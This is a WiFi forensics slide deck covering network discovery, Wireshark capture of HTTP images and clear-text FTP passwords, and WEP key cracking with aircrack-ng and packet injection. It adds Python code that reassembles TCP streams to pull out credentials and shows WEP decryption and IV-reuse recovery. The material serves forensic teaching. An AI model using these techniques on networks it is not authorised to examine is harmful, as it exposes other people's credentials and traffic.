The Channel Use chart displays, on mouseover, the number of local WiFi routers on the selected channel, as well as their status (green for "Available", blue for "Connected", red for "Not Available").
The majority of small WiFi installations use channel 6, the factory default on most consumer routers.
WiFi Network Discovery: Windows "Wireless Mon" WiFi "Managed Mode" Network Discovery Example (cont'd)
In the example below, the Wireless Mon Summary tab shows:
"SSID" (Service Set ID): the network name
"MAC Address" (Media Access Control address): six bytes (48 bits) long, of which the first three bytes (the Organizationally Unique Identifier, "OUI") identify the manufacturer
FCC WiFi channel assignment
WiFi "Security" (encryption) mode: "None", WEP (weakest encryption), WPA2, or WPA-PSK
NOTE THAT A LARGE PERCENTAGE OF DEPLOYED SMALL SYSTEMS HAVE ROUTERS BROADCASTING THE MANUFACTURER'S DEFAULT NAME (e.g. "linksys", "2WIRE351"), which usually also means default settings and, often, a default admin password.
WiFi Network Discovery: Windows "Wireless Mon" WiFi "Managed Mode" Network Discovery Example (cont'd)
Use the Summary tab to further observe the list of nearby WiFi networks. In the example below, the Summary tab shows that all of the listed WiFi networks:
Deploy "Infrastructure" mode (a wireless router broadcasts to all nearby receivers)
Support 54 Mbit/s rates
Use Orthogonal Frequency-Division Multiplexing (shown by Wireless Mon as "OFDM24")
Wireless Mon can store WiFi discovery results for input to forensic reports.
WiFi Network Discovery: Wireless LAN WiFi PC Adapter (Monitor Mode) for Windows
CACE (Creative Advanced Communication Engineering) "AirPcap TX" Monitor Mode USB wireless adapter:
Contains its own WiFi antenna
Uses WinPcap 4.01 (beta) packet-capture software
Provides the packet injection required by WiFi password-cracking software such as aircrack-ng
Shipped with the popular Wireshark sniffer software
Supports Windows Vista
CACE Model "AirPcap TX"
WiFi Packet Sniffing Example: Wireshark
1. "Associate" (connect) with the WiFi network.
2. Select the sniffer "Interface" (the WiFi Monitor Mode network card), then click "Options".
WiFi Packet Sniffing Example: Wireshark (cont'd)
3. Select the packet sniffing "Options".
WiFi Packet Sniffing Example: Wireshark (cont'd)
4. Click "Start". NOTE the desktop PC printer frame (UNIX CUPS) below.
WiFi Packet Sniffing Example: Wireshark (cont'd)
5. Click Stop in the Wireshark Capture menu.
6. Browse through Wireshark's frame list and observe the forensic target WiFi user's "web surfing" (HTTP) frames.
7. Type the expression "http" in the Wireshark "Display Filter", then click the adjacent "Apply" button.
8. Wireshark will then display only "web surfing" (HTTP) frames.
WiFi Packet Sniffing Example: Wireshark (cont'd)
WIRESHARK DISPLAY OF HTTP FRAMES ONLY (screenshot; slide reused from a 7/9/2008 deck, © 2008 CACI, marked "For HTCIA/CACI/Gov't Use Only")
WiFi Packet Sniffing Example: Wireshark (cont'd)
The forensics examiner may recover IMAGES from captured HTTP "web surfing" frames: right-click on the "JPEG File Interchange Format" line in the packet details and export the raw image (as "Imagexx.jpg") to a folder. RESULT: (screenshot)
WiFi Packet Sniffing Example: Wireshark (cont'd)
WIRESHARK DISPLAY OF HTTP FRAME HISTORICAL "THREADS":
Click on the first HTTP frame of interest, usually a GET request.
In the Wireshark Analyze menu, click Follow TCP Stream.
The TCP stream is reassembled and displayed as one conversation, parsed by web-page activity.
WiFi Packet Sniffing Example: Wireshark (cont'd)
FREE IDENTIFICATION OF WEBSITE ORIGINS from HTTP frames of interest (usually GET requests): type the website IP address into the LIVE PRODUCT DEMO at:
EXAMPLE: (screenshot)
RESULT: (screenshot)
Note that a single IP address may host many sites; the Host header in the GET request names the one actually visited.
WiFi Packet Sniffing Example: Wireshark (cont'd)
WIRESHARK DISPLAY OF FTP FRAMES ONLY: type the expression "ftp" in the Wireshark "Display Filter", then click the adjacent "Apply" button. Wireshark will then display only File Transfer Protocol (FTP) frames.
WiFi Packet Sniffing Example: Wireshark (cont'd)
The forensics examiner may observe the USERNAME and PASSWORD in captured FTP frames, because FTP sends both in clear text (the USER and PASS commands).
WiFi Packet Sniffing Example: Wireshark (cont'd)
WIRESHARK DISPLAY OF FTP FRAME HISTORICAL "THREADS":
Click on the first FTP frame of interest, usually the USER command.
In the Wireshark Analyze menu, click Follow TCP Stream.
The TCP stream is reassembled and displayed as one conversation, with commands and server replies in order.
WiFi Packet Sniffing Example: Wireshark (cont'd)
WIRESHARK DISPLAY OF GOOGLE MAIL FRAMES ONLY: in the Wireshark "Display Filter", type ip.addr == followed by the captured Google Mail server address (or http.host contains "mail.google.com" for any HTTP requests), then click the adjacent "Apply" button. Wireshark will then display only Google Mail frames. ("host ..." on its own is capture-filter syntax, not display-filter syntax.)
Caveat: Gmail has defaulted to HTTPS since 2010, so the examiner will see which server was contacted and when, but the message contents are TLS-encrypted.
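What the Wireshark steps on the HTTP and FTP slides do under the hood, as an added example that is not part of the original deck: a minimal pcap writer and reader, an Ethernet/IPv4/TCP header parser, a simplified "Follow TCP Stream" that groups segments by 4-tuple and orders them by sequence number, and the credential extraction an examiner performs by eye on the FTP and HTTP streams. The capture is constructed in the code (addresses, ports and payloads are made up); a real capture also carries the server's side of each conversation and retransmissions, which this reassembler does not deduplicate.

```python
# Added example (not from the slides): reassemble TCP streams from a pcap and
# pull clear-text FTP and HTTP credentials/requests out of them, the way an
# examiner does with Wireshark's display filters and Follow TCP Stream.
import socket
import struct

LINKTYPE_ETHERNET = 1


def pcap_global_header() -> bytes:
    return struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)


def tcp_packet(src_ip, dst_ip, sport, dport, seq, payload: bytes) -> bytes:
    """Ethernet + IPv4 + TCP (PSH/ACK) with the given payload; checksums left zero
    because the parser below does not verify them (Wireshark would flag that)."""
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + b"\x08\x00"
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload), 1, 0, 64, 6, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    return eth + ip + tcp + payload


def write_pcap(packets) -> bytes:
    out = bytearray(pcap_global_header())
    for i, pkt in enumerate(packets):
        out += struct.pack("<IIII", 1369267200 + i, 0, len(pkt), len(pkt)) + pkt
    return bytes(out)


def read_pcap(data: bytes):
    """Yield the raw link-layer bytes of each record in a little-endian pcap file."""
    assert struct.unpack_from("<I", data, 0)[0] == 0xA1B2C3D4
    off = 24
    while off + 16 <= len(data):
        _, _, incl, _ = struct.unpack_from("<IIII", data, off)
        off += 16
        yield data[off:off + incl]
        off += incl


def parse_tcp(pkt: bytes):
    """Return (src, sport, dst, dport, seq, payload) for IPv4/TCP over Ethernet, else None."""
    if pkt[12:14] != b"\x08\x00":                    # not IPv4
        return None
    ihl = (pkt[14] & 0x0F) * 4
    if pkt[23] != 6:                                 # not TCP
        return None
    total_len = struct.unpack_from("!H", pkt, 16)[0]
    src, dst = socket.inet_ntoa(pkt[26:30]), socket.inet_ntoa(pkt[30:34])
    t = 14 + ihl
    sport, dport, seq = struct.unpack_from("!HHI", pkt, t)
    doff = (pkt[t + 12] >> 4) * 4
    return src, sport, dst, dport, seq, pkt[t + doff:14 + total_len]


def follow_streams(pcap_bytes: bytes) -> dict:
    """Simplified Follow TCP Stream: one direction per 4-tuple, segments ordered by
    sequence number so out-of-order captures still read correctly."""
    segs = {}
    for pkt in read_pcap(pcap_bytes):
        p = parse_tcp(pkt)
        if p is None:
            continue
        src, sport, dst, dport, seq, payload = p
        segs.setdefault((src, sport, dst, dport), []).append((seq, payload))
    return {k: b"".join(pl for _, pl in sorted(v)) for k, v in segs.items()}


def extract_credentials(streams: dict) -> dict:
    """FTP: USER/PASS lines in the clear. HTTP: request line plus Host header."""
    found = {"ftp": [], "http": []}
    for (src, sport, dst, dport), data in streams.items():
        lines = data.decode("latin-1").split("\r\n")
        if dport == 21:
            user = next((l[5:] for l in lines if l.startswith("USER ")), None)
            pw = next((l[5:] for l in lines if l.startswith("PASS ")), None)
            if user:
                found["ftp"].append((src, user, pw))
        elif dport == 80:
            for i, l in enumerate(lines):
                if l.startswith(("GET ", "POST ")):
                    host = next((h[6:] for h in lines[i:i + 20] if h.startswith("Host: ")), "")
                    found["http"].append((src, host + l.split()[1]))
    return found


def sample_capture() -> bytes:
    """Constructed capture: an FTP login (recorded out of order) and one HTTP request."""
    return write_pcap([
        tcp_packet("10.0.0.5", "10.0.0.9", 40001, 21, 13, b"PASS s3cret\r\n"),
        tcp_packet("10.0.0.5", "10.0.0.9", 40001, 21, 1, b"USER alice\r\n"),
        tcp_packet("10.0.0.5", "10.0.0.80", 40002, 80, 100,
                   b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"),
    ])


if __name__ == "__main__":
    print(extract_credentials(follow_streams(sample_capture())))
```

The reassembly step is what turns a pile of frames into evidence: the USER and PASS lines arrive in different packets, possibly captured out of order, and only the ordered stream shows the login as the user typed it.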
WiFi WEP Password Cracking Example: Decrypt WEP (Wired Equivalent Privacy) Capture File
Windows command line, with partial GUI support. The examiner clicks on airodump-ng-airpcap and completes the "IV capture" startup screen:
57
Copyright 2013 Creative Commerce LLC
WiFi WEP Password Cracking Example – Decrypt WEP (Wired Equivalent Privacy) – Begin Creating IV Capture File
Airodump-ng automatically gathers the IVs (Initialization Vectors), which every WEP data frame carries in the clear, starting at a slow pace (watch the #Data column). Rule of thumb on the slide: 250,000+ IVs to break a 64-bit (40-bit secret) WEP key and 1,500,000+ IVs for a 128-bit (104-bit secret) key. Those figures date from the FMS/KoreK statistical attacks; aircrack-ng's default PTW attack typically needs only tens of thousands of IVs (roughly 20,000+ for 64-bit and 40,000 to 85,000 for 128-bit keys). Either way the target WiFi router MUST BE ACTIVE (users web surfing, etc.), since only encrypted data frames yield IVs.
WiFi WEP Password Cracking Example – Decrypt WEP (Wired Equivalent Privacy) – Accelerate IV Capture – Packet Injection
The examiner uses the aireplay-ng command-line utility to constantly inject packets, normally by replaying captured ARP requests (after a fake authentication if no associated client is available), which forces the target to emit fresh WEP frames with new IVs for airodump-ng to capture. Injection is active, not passive: target WiFi router performance may be impacted, and a wireless intrusion detection system (IDS) may alert on the replay traffic. Injection also requires an adapter and driver that support transmit in monitor mode (the AirPcap TX model on Windows).
WiFi WEP Password Cracking Example – Decrypt WEP (Wired Equivalent Privacy) Capture File
Windows OS command line with partial GUI support. The forensic examiner clicks on the aircrack-ng GUI and completes the key-recovery screen, pointing it at the capture file(s) written by airodump-ng and, if several networks were captured, the target BSSID.
WiFi WEP Password Cracking Example – Recovered Key Display by Aircrack-ng
SUCCESSFUL KEY RECOVERY: The forensic examiner may enter the recovered key (hex format 66756A7839, i.e. ASCII fujx9, a 40-bit secret, marketed as “64-bit WEP”) into Wireshark's IEEE 802.11 protocol preferences under Decryption Keys (key type wep, hex string). Wireshark then automatically decrypts the captured frames and displays their contents. The forensic examiner may also “log on” to (associate with) the WiFi network (BSS) bulliron using the passkey fujx9.
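What Wireshark does once the recovered key is entered, and why the key was recoverable in the first place, as an added example that is not part of the deck or of the aircrack-ng or Wireshark projects: textbook RC4 with the WEP frame-body layout IV | KeyID | RC4(data | CRC-32), keyed with the slide's recovered key 66756A7839 (fujx9). The plaintexts and IV values are constructed, not captured.

```python
"""Added example, not from the deck: WEP encryption/decryption from scratch using
the key recovered on the slide, plus the IV-reuse weakness. Frames are constructed."""
import struct
import zlib

# Key recovered on the slide: hex 66756A7839 == ASCII "fujx9" (40-bit secret, "64-bit WEP").
WEP_KEY = bytes.fromhex("66756A7839")

def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4: key scheduling, then XOR the keystream over data (encrypt == decrypt)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def icv(data: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32, little-endian (no secret involved)."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)

def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes, key_id: int = 0) -> bytes:
    """Encrypted 802.11 frame body: IV(3) | KeyID(1) | RC4(data | ICV).
    The per-packet RC4 key is IV || shared key with the IV sent in the clear,
    which is exactly what the FMS/KoreK/PTW attacks in aircrack-ng exploit."""
    if len(iv) != 3 or len(key) not in (5, 13):
        raise ValueError("IV must be 3 bytes; WEP key must be 5 or 13 bytes")
    return iv + bytes([key_id << 6]) + rc4(iv + key, plaintext + icv(plaintext))

def wep_decrypt(key: bytes, body: bytes):
    """What Wireshark does with the entered key: decrypt and check the ICV.
    Returns (plaintext, icv_ok); a wrong key or a tampered frame fails the check."""
    iv, ciphertext = body[:3], body[4:]
    plain = rc4(iv + key, ciphertext)
    data, tag = plain[:-4], plain[-4:]
    return data, tag == icv(data)

def recover_with_reused_iv(body_a: bytes, known_plain_a: bytes, body_b: bytes) -> bytes:
    """Only 2^24 IVs exist, so a busy BSS repeats them. Two bodies with the same IV
    share one RC4 keystream: C_a XOR C_b = P_a XOR P_b, so a known plaintext for
    one frame (e.g. an ARP request) reveals the other with no key at all."""
    if body_a[:3] != body_b[:3]:
        raise ValueError("IVs differ; keystreams are not shared")
    ct_a, ct_b = body_a[4:], body_b[4:]
    n = min(len(ct_a), len(ct_b), len(known_plain_a))
    keystream = bytes(c ^ p for c, p in zip(ct_a[:n], known_plain_a[:n]))
    return bytes(c ^ k for c, k in zip(ct_b[:n], keystream))

if __name__ == "__main__":
    body = wep_encrypt(WEP_KEY, b"\x01\x02\x03", b"GET /index.html HTTP/1.1\r\n")
    print(wep_decrypt(WEP_KEY, body))
```

Two design points follow from the code. The ICV is an unkeyed CRC-32, so it detects transmission errors but not deliberate modification, and a wrong key only fails the check by accident of the CRC, which is why Wireshark cannot tell a wrong key from corrupted frames with certainty. The per-packet key is the 24-bit cleartext IV prepended to the shared secret; with every frame starting with the same 802.2 SNAP byte (0xAA), each captured frame leaks one keystream byte per IV, and that is the statistical material aircrack-ng accumulates in the #Data column.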
Questions?
Web Links
Hawking Handheld Directional WiFi Detector mID=71&ProdID=131
Wireshark Packet Sniffer / Analyzer
CACE (Creative Advanced Communication Engineering) “AirPcap TX” Monitor Mode USB Wireless Adapter for Microsoft Windows
“AirCrack” Password Cracking Software
Web Links (cont’d)
WEP WiFi Encryption “Cracking”
WPA/WPA2 WiFi Encryption “Cracking”
Packet Captures and Network Devices
Web Links (cont’d)
Remote-Exploit.org “BackTrack 4” Forensics CD (Linux programs run “independently” from the user's CD drive)
PassMark “WirelessMon” Wireless Network Enumeration (“Stumbler”) Utility
Web Links (cont’d)
WIGLE (Wireless Geographic Logging Engine) – List of Default WiFi “Service Set IDs” (SSIDs)
Institute of Electrical and Electronics Engineers (IEEE) Searchable List of MAC Address “OUI” (Organizationally Unique Identifier) Manufacturer Codes – the first 3 bytes of a MAC address
Web Links (cont’d)
Forensic Software Product Line Overview from Clarifying Technologies products/products_public.html
RADIUS “Challenge” User Authentication/Password Utility nge%252Fresponse.html
Questions?
Mike Davis, EE/MSEE, CISSP, SysEngr (ISSA/TSN/SOeC/AFCEA/NDIA/IEEE/INCOSE et al.)
Glenn G. Jacobs, BSEE, Security+
Creative Commerce LLC